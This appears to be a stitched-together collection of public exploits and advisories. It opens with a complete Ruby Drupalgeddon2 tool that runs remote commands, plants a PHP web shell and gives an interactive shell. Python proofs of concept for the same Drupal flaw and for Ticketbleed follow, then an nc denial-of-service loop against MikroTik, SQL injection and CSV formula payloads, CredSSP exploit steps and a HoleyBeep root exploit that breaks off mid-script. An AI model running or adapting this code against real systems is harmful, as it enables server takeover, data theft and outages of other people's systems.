# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
require 'base64'
require 'json'
require 'net/http'
require 'openssl'
require 'readline'
require 'highline/import'
# Settings - Try to write a PHP to the web root?
try_phpshell = true
# Settings - General/Stealth
$useragent = "drupalgeddon2"
webshell = "shell.php"
# Settings - Proxy information (nil to disable)
$proxy_addr = nil
$proxy_port = 8080
# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Function http_request <url> [type] [data]
def http_request(url, type="get", payload="", cookie="")
puts verbose("HTTP - URL : #{url}") if $verbose
puts verbose("HTTP - Type: #{type}") if $verbose
puts verbose("HTTP - Data: #{payload}") if not payload.empty? and $verbose
begin
uri = URI(url)
request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)
request.initialize_http_header({"User-Agent" => $useragent})
request.initialize_http_header("Cookie" => cookie) if not cookie.empty?
request.body = payload if not payload.empty?
return $http.request(request)
rescue SocketError
puts error("Network connectivity issue")
rescue Errno::ECONNREFUSED => e
puts error("The target is down ~ #{e.message}")
puts error("Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...") if $proxy_addr
rescue Timeout::Error => e
puts error("The target timed out ~ #{e.message}")
end
# If we got here, something went wrong.
exit
end
# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")
puts info("Payload: #{evil}") if not shell
puts verbose("Element : #{element}") if not shell and not element.empty? and $verbose
puts verbose("PHP fn : #{phpfunction}") if not shell and $verbose
# Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render
# Check the version to match the payload
if $drupalverion.start_with?("8") and element == "mail"
# Method #1 - Drupal v8.x: mail, #post_render - HTTP 200
url = $target + $clean_url + $form + "?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
elsif $drupalverion.start_with?("8") and element == "timezone"
# Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru
url = $target + $clean_url + $form + "?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=" + phpfunction + "&timezone[a][#lazy_builder][][]=" + evil
#puts warning("WARNING: May benefit to use a PHP web shell") if not try_phpshell and phpfunction != "passthru"
elsif $drupalverion.start_with?("7") and element == "name"
# Method #3 - Drupal v7.x: name, #post_render - HTTP 200
url = $target + "#{$clean_url}#{$form}&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil
payload = "form_id=user_pass&_triggering_element_name=name"
end
# Drupal v7.x needs an extra value from a form
if $drupalverion.start_with?("7")
response = http_request(url, "post", payload, $session_cookie)
form_name = "form_build_id"
puts verbose("Form name : #{form_name}") if $verbose
form_value = response.body.match(/input type="hidden" name="#{form_name}" value="(.*)"/).to_s.slice(/value="(.*)"/, 1).to_s.strip
puts warning("WARNING: Didn't detect #{form_name}") if form_value.empty?
puts verbose("Form value : #{form_value}") if $verbose
url = $target + "#{$clean_url}file/ajax/name/%23value/" + form_value
payload = "#{form_name}=#{form_value}"
end
return url, payload
end
# Function clean_result <input>
def clean_result(input)
#result = JSON.pretty_generate(JSON[response.body])
#result = $drupalverion.start_with?("8")? JSON.parse(clean)[0]["data"] : clean
clean = input.to_s.strip
# PHP function: passthru
# For: <payload>[{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
clean.slice!(/\[{"command":".*}\]$/)
# PHP function: exec
# For: [{"command":"insert","method":"replaceWith","selector":null,"data":"<payload>\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
#clean.slice!(/\[{"command":".*data":"/)
#clean.slice!(/\\u003Cspan class=\\u0022.*}\]$/)
# Newer PHP for an older Drupal
# For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />
#clean.slice!(/<b>.*<br \/>/)
# Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500
# For: <b>Deprecated</b>: assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />
clean.slice!(/The website encountered an unexpected error.*/)
return clean
end
# Feedback when something goes right
def success(text)
# Green
return "\e[#{32}m[+]\e[0m #{text}"
end
# Feedback when something goes wrong
def error(text)
# Red
return "\e[#{31}m[-]\e[0m #{text}"
end
# Feedback when something may have issues
def warning(text)
# Yellow
return "\e[#{33}m[!]\e[0m #{text}"
end
# Feedback when something doing something
def action(text)
# Blue
return "\e[#{34}m[*]\e[0m #{text}"
end
# Feedback with helpful information
def info(text)
# Light blue
return "\e[#{94}m[i]\e[0m #{text}"
end
# Feedback for the overkill
def verbose(text)
# Dark grey
return "\e[#{90}m[v]\e[0m #{text}"
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def init_authentication()
$uname = ask('Enter your username: ') { |q| q.echo = false }
$passwd = ask('Enter your password: ') { |q| q.echo = false }
$uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true }
$passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true }
$login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true }
$creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true }
end
def is_arg(args, param)
args.each do |arg|
if arg == param
return true
end
end
return false
end
# Quick how to use
def usage()
puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'
puts 'Example for target that does not require authentication:'
puts ' ruby drupalgeddon2.rb https://example.com'
puts 'Example for target that does require authentication:'
puts ' ruby drupalgeddon2.rb https://example.com --authentication'
end
# Read in values
if ARGV.empty?
usage()
exit
end
$target = ARGV[0]
init_authentication() if is_arg(ARGV, '--authentication')
$verbose = is_arg(ARGV, '--verbose')
# Check input for protocol
$target = "http://#{$target}" if not $target.start_with?("http")
# Check input for the end
$target += "/" if not $target.end_with?("/")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
puts action("--==[::#Drupalggedon2::]==--")
puts "-"*80
puts info("Target : #{$target}")
puts info("Proxy : #{$proxy_addr}:#{$proxy_port}") if $proxy_addr
puts info("Write? : Skipping writing PHP web shell") if not try_phpshell
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Setup connection
uri = URI($target)
$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)
# Use SSL/TLS if needed
if uri.scheme == "https"
$http.use_ssl = true
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
$session_cookie = ''
# If authentication required then login and get session cookie
if $uname
$payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix
response = http_request($target + $login_path, 'post', $payload, $session_cookie)
if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']
$session_cookie = response['set-cookie'].split('; ')[0]
puts success("Logged in - Session Cookie : #{$session_cookie}")
end
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Try and get version
$drupalverion = ""
# Possible URLs
url = [
# --- changelog ---
# Drupal v6.x / v7.x [200]
$target + "CHANGELOG.txt",
# Drupal v8.x [200]
$target + "core/CHANGELOG.txt",
# --- bootstrap ---
# Drupal v7.x / v6.x [403]
$target + "includes/bootstrap.inc",
# Drupal v8.x [403]
$target + "core/includes/bootstrap.inc",
# --- database ---
# Drupal v7.x / v6.x [403]
$target + "includes/database.inc",
# Drupal v7.x [403]
#$target + "includes/database/database.inc",
# Drupal v8.x [403]
#$target + "core/includes/database.inc",
# --- landing page ---
# Drupal v8.x / v7.x [200]
$target,
]
# Check all
url.each do|uri|
# Check response
response = http_request(uri, 'get', '', $session_cookie)
# Check header
if response['X-Generator'] and $drupalverion.empty?
header = response['X-Generator'].slice(/Drupal (.*) \(https:\/\/www.drupal.org\)/, 1).to_s.strip
if not header.empty?
$drupalverion = "#{header}.x" if $drupalverion.empty?
puts success("Header : v#{header} [X-Generator]")
puts verbose("X-Generator: #{response['X-Generator']}") if $verbose
end
end
# Check request response, valid
if response.code == "200"
tmp = $verbose ? " [HTTP Size: #{response.size}]" : ""
puts success("Found : #{uri} (HTTP Response: #{response.code})#{tmp}")
# Check to see if it says: The requested URL "http://<URL>" was not found on this server.
puts warning("WARNING: Could be a false-positive [1-1], as the file could be reported to be missing") if response.body.downcase.include? "was not found on this server"
# Check to see if it says: <h1 class="js-quickedit-page-title title page-title">Page not found</h1> <div class="content">The requested page could not be found.</div>
puts warning("WARNING: Could be a false-positive [1-2], as the file could be reported to be missing") if response.body.downcase.include? "the requested page could not be found"
# Only works for CHANGELOG.txt
if uri.match(/CHANGELOG.txt/)
# Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x
puts warning("WARNING: Unable to detect keyword 'drupal.org'") if not response.body.downcase.include? "drupal.org"
# Patched already? (For Drupal v8.4.x / v7.x)
puts warning("WARNING: Might be patched! Found SA-CORE-2018-002: #{url}") if response.body.include? "SA-CORE-2018-002"
# Try and get version from the file contents (For Drupal v8.4.x / v7.x)
$drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
# Blank if not valid
$drupalverion = "" if not $drupalverion[-1] =~ /\d/
end
# Check meta tag
if not response.body.empty?
# For Drupal v8.x / v7.x
meta = response.body.match(/<meta name="Generator" content="Drupal (.*) /)
metatag = meta.to_s.slice(/meta name="Generator" content="Drupal (.*) \(http/, 1).to_s.strip
if not metatag.empty?
$drupalverion = "#{metatag}.x" if $drupalverion.empty?
puts success("Metatag: v#{$drupalverion} [Generator]")
puts verbose(meta.to_s) if $verbose
end
end
# Done! ...if a full known version, else keep going... may get lucky later!
break if not $drupalverion.end_with?("x") and not $drupalverion.empty?
end
# Check request response, not allowed
if response.code == "403" and $drupalverion.empty?
tmp = $verbose ? " [HTTP Size: #{response.size}]" : ""
puts success("Found : #{uri} (HTTP Response: #{response.code})#{tmp}")
if $drupalverion.empty?
# Try and get version from the URL (For Drupal v.7.x/v6.x)
$drupalverion = uri.match(/includes\/database.inc/)? "7.x/6.x" : "" if $drupalverion.empty?
# Try and get version from the URL (For Drupal v8.x)
$drupalverion = uri.match(/core/)? "8.x" : "" if $drupalverion.empty?
# If we got something, show it!
puts success("URL : v#{$drupalverion}?") if not $drupalverion.empty?
end
else
tmp = $verbose ? " [HTTP Size: #{response.size}]" : ""
puts warning("MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}")
end
end
# Feedback
if not $drupalverion.empty?
status = $drupalverion.end_with?("x")? "?" : "!"
puts success("Drupal#{status}: v#{$drupalverion}")
else
puts error("Didn't detect Drupal version")
exit
end
if not $drupalverion.start_with?("8") and not $drupalverion.start_with?("7")
puts error("Unsupported Drupal version (#{$drupalverion})")
exit
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# The attack vector to use
$form = $drupalverion.start_with?("8")? "user/register" : "user/password"
# Make a request, check for form
url = "#{$target}?q=#{$form}"
puts action("Testing: Form (#{$form})")
response = http_request(url, 'get', '', $session_cookie)
if response.code == "200" and not response.body.empty?
puts success("Result : Form valid")
elsif response['location']
puts error("Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}")
exit
elsif response.code == "404"
puts error("Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?")
exit
elsif response.code == "403"
puts error("Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?")
exit
elsif response.body.empty?
puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response")
exit
else
puts warning("WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})")
end
puts "- "*40
# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register
# Drupal v7.x needs it anyway
$clean_url = $drupalverion.start_with?("8")? "" : "?q="
url = "#{$target}#{$form}"
puts action("Testing: Clean URLs")
response = http_request(url, 'get', '', $session_cookie)
if response.code == "200" and not response.body.empty?
puts success("Result : Clean URLs enabled")
else
$clean_url = "?q="
puts warning("Result : Clean URLs disabled (HTTP Response: #{response.code})")
puts verbose("response.body: #{response.body}") if $verbose
# Drupal v8.x needs it to be enabled
if $drupalverion.start_with?("8")
puts error("Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE")
exit
elsif $drupalverion.start_with?("7")
puts info("Isn't an issue for Drupal v7.x")
end
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Values in gen_evil_url for Drupal v8.x
elementsv8 = [
"mail",
"timezone",
]
# Values in gen_evil_url for Drupal v7.x
elementsv7 = [
"name",
]
elements = $drupalverion.start_with?("8") ? elementsv8 : elementsv7
elements.each do|e|
$element = e
# Make a request, testing code execution
puts action("Testing: Code Execution (Method: #{$element})")
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}", e)
response = http_request(url, "post", payload, $session_cookie)
if (response.code == "200" or response.code == "500") and not response.body.empty?
result = clean_result(response.body)
if not result.empty?
puts success("Result : #{result}")
if response.body.match(/#{random}/)
puts success("Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!")
break
else
puts warning("WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result")
end
else
puts warning("WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... Didn't detect any INJECTED output (disabled PHP function?)")
end
puts warning("WARNING: Target MIGHT be exploitable [5]... Blind attack?") if response.code == "500"
puts verbose("response.body: #{response.body}") if $verbose
puts verbose("clean_result: #{result}") if not result.empty? and $verbose
elsif response.body.empty?
puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response")
exit
else
puts error("Target is NOT exploitable [1] (HTTP Response: #{response.code})")
puts verbose("response.body: #{response.body}") if $verbose
exit
end
puts "- "*40 if e != elements.last
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Location of web shell & used to signal if using PHP shell
webshellpath = ""
prompt = "drupalgeddon2"
# Possibles paths to try
paths = [
# Web root
"",
# Required for setup
"sites/default/",
"sites/default/files/",
# They did something "wrong", chmod -R 0777 .
#"core/",
]
# Check all (if doing web shell)
paths.each do|path|
# Check to see if there is already a file there
puts action("Testing: Existing file (#{$target}#{path}#{webshell})")
response = http_request("#{$target}#{path}#{webshell}", 'get', '', $session_cookie)
if response.code == "200"
puts warning("Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***")
else
puts info("Response: HTTP #{response.code} // Size: #{response.size}")
end
puts "- "*40
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
folder = path.empty? ? "./" : path
puts action("Testing: Writing To Web Root (#{folder})")
# Merge locations
webshellpath = "#{path}#{webshell}"
# Final command to execute
cmd = "#{bashcmd} | tee #{webshellpath}"
# By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess
# ...however, Drupal v8.x disables the PHP engine using: ./.htaccess
if path == "sites/default/files/"
puts action("Moving : ./sites/default/files/.htaccess")
cmd = "mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}"
end
# Generate evil URLs
url, payload = gen_evil_url(cmd, $element)
# Make the request
response = http_request(url, "post", payload, $session_cookie)
# Check result
if response.code == "200" and not response.body.empty?
# Feedback
result = clean_result(response.body)
puts success("Result : #{result}") if not result.empty?
# Test to see if backdoor is there (if we managed to write it)
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
if response.code == "200" and not response.body.empty?
puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
break
elsif response.code == "404"
puts warning("Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?")
elsif response.code == "403"
puts warning("Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?")
elsif response.body.empty?
puts warning("Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back")
else
puts warning("Target is NOT exploitable [2-1] (HTTP Response: #{response.code})")
puts verbose("response.body: #{response.body}") if $verbose
end
elsif response.code == "500" and not response.body.empty?
puts warning("Target MAY of been exploited... Bit of blind leading the blind")
break
elsif response.code == "404"
puts warning("Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?")
elsif response.code == "403"
puts warning("Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?")
elsif response.body.empty?
puts warning("Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back")
else
puts warning("Target is NOT exploitable [1-1] (HTTP Response: #{response.code})")
puts verbose("response.body: #{response.body}") if $verbose
end
webshellpath = ""
puts "- "*40 if path != paths.last
end if try_phpshell
# If a web path was set, we exploited using PHP!
if not webshellpath.empty?
# Get hostname for the prompt
prompt = response.body.to_s.strip if response.code == "200" and not response.body.empty?
puts "-"*80
puts info("Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'")
# Should we be trying to call commands via PHP?
elsif try_phpshell
puts warning("FAILED : Couldn't find a writeable web path")
puts "-"*80
puts action("Dropping back to direct OS commands")
end
# Stop any CTRL + C action ;)
trap("INT", "SIG_IGN")
# Forever loop
loop do
# Default value
result = "~ERROR~"
# Get input
command = Readline.readline("#{prompt}>> ", true).to_s
# Check input
puts warning("WARNING: Detected an known bad character (>)") if command =~ />/
# Exit
break if command == "exit"
# Blank link?
next if command.empty?
# If PHP web shell
if not webshellpath.empty?
# Send request
result = http_request("#{$target}#{webshellpath}", "post", "c=#{command}", $session_cookie).body
# Direct OS commands
else
url, payload = gen_evil_url(command, $element, true)
response = http_request(url, "post", payload, $session_cookie)
# Check result
if not response.body.empty?
result = clean_result(response.body)
end
end
# Feedback
puts result
end
# Exploit Title: Joomla Extension Convert Forms version 2.0.3 is vulnerable to Formula Injection (CSV Injection)
# Google Dork: N/A
# Date: 12-04-2018
################################
# Exploit Author: Jetty Sairam
################################
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
# Affected Version: 2.03 and before
#Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE : CVE-2018-10063
1. Application Description:
Convert Forms provides a framework to build custom forms for Joomla users.
2. Technical Description:
Custom Forms version 2.0.3 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When high privileged user logs into the application to export form data in CSV and opens the file.
Formula gets executed and calculator will get popped in his machine.
4. Solution:
Upgrade to version 2.0.4
https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
5. Reference:
https://vel.joomla.org/resolved/2160-convert-forms-2-0-3-csv-injection
https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
https://vel.joomla.org/articles/2140-introducing-csv-injection
#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
check = requests.get(target + 'hello.txt')
if check.status_code != 200:
sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
# -*- coding: utf-8 -*-
#!/usr/bin/python
# Exploit Title: Ticketbleed
# Google Dork: n/a
# Date: Exploit: 02/13/17, Advisory Published: 02/09/17
# Exploit Author: @0x00string
# Vendor Homepage: https://f5.com/
# Software Link: https://support.f5.com/csp/article/K05121675
# Version: see software link for versions
# Tested on: F5 BIGIP 11.6
# CVE : CVE-2016-9244
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
import re, getopt, sys, socket
from struct import *
try:
from scapy_ssl_tls.ssl_tls import *
except ImportError:
from scapy.layers.ssl_tls import *
def banner():
print '''
lol ty filippo!
ty tintinweb!
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target port\n"
"\n\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 443\n"
"python script.py --rhost 10.10.10.10 --rport 8443")
exit()
def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)
i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d
def ticketBleed (rhost, rport):
h = (rhost,int(rport));
version = TLSVersion.TLS_1_2
secret = ""
session_ticket = ""
sid = ""
cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
sock.sendall(packet)
sock.recvall()
packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
sock.sendall(to_raw(TLSFinished(), ctx))
ret = sock.recvall()
session_ticket = ret[TLSSessionTicket].ticket
secret = ctx.master_secret
#pretty("*", "ctx 1: \n" + str(ctx))
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
sock.tls_ctx.resume_session(secret)
sock.sendall(packet)
ret = sock.recvall()
sid = ret[TLSServerHello].session_id
#pretty("*", "ctx 2: \n" + str(ctx))
pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
def main():
rhost = None;
rport = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
banner()
if rhost is None or rport is None:
usage()
ticketBleed(rhost,rport)
exit(0);
if __name__ == "__main__":
main()
################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################
for i in `seq 1 100`
do
cat craft | nc -nv <MikroTik IP> 21 &
sleep 2
done
# Exploit Title: Cobub Razor 0.8.0 SQL injection Vulnerability
# Date: 2018-04-16
# Exploit Author: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8057
The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.
Code source:
/application/controllers/manage/channel.php at line 75-95
The SQL injection type: error-based and AND/OR time-based blind
Parameter: channel_name,platform
PoC:
http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
# credssp
This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay.
Written by Eyal Karni, Preempt
ekarni@preempt.com
# Build
## Instructions (Linux)
If you are using Ubuntu 14 , check the install file..
It was tested on Ubuntu 16.04.
```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```
EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44453.zip
* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).
* A different version of openssl needed to be installed for this to run successfully. The install script does that.
* Please follow the instructions in the described order.
# Running the exploit
Export a certificate suitable for Server Authentication from any domain.
To generate a suitable certificate for the command to execute :
```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
```
(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
To run the attack script:
```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```
More details are in the usage section of the scripts(--help).
#!/usr/bin/env python3
#
# E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc
# E-DB Note ~ https://sigint.sh/#/holeybeep
#
# This is an exploit for HoleyBeep.
#
# To use it, place any command you want root to execute in `/tmp/x`.
# ```
# $ cat /tmp/x
# echo PWNED $(whoami)
# ```
# The exploit takes a path to write to (the file must already exist) and rewrites its first bytes to /*/x. This means that if it's a shell script, it will execute /tmp/x as its first and only command.
#
# To gain root access, the idea is to use the exploit to overwrite any file in /etc/profile.d/ so it will execute /*/x on the next login, possibly as the root user.
#
# Variants are possible using cron instead of the shell, so you don't have to wait until root logs in.
#
import argparse
import shutil
import os
import subprocess
import time
import signal
import ntpath
TMP_PATH="beep_exploit"
def backup_output(path):
backup_path = ntpath.basename(path + ".bak")
if os.path.isfile(path):
shutil.copy(path, backup_path)
print('Backup made at \'{}\''.format(backup_path))
def main():
parser = argparse.ArgumentParser(description='Holey beep exploit script.')
parser.add_argument('output', metavar='OUTPUT', help='the output file to corrupt')
parser.add_argument('--path', default="/usr/bin/beep", help='path to beep')
parser.add_argument('--time-low', default=6000, type=int, help='time to wait (micro-seconds), lower bound')
parser.add_argument('--time-high', default=6900, type=int, help='time to wait (micro-seconds), higher bound')
parser.add_argument('--no-backup', action='store_true', help='doesn\'t backup the output file')
args = parser.parse_args()
if not args.no_backup:
backup_output(args.output)
devnull = open("/dev/null")
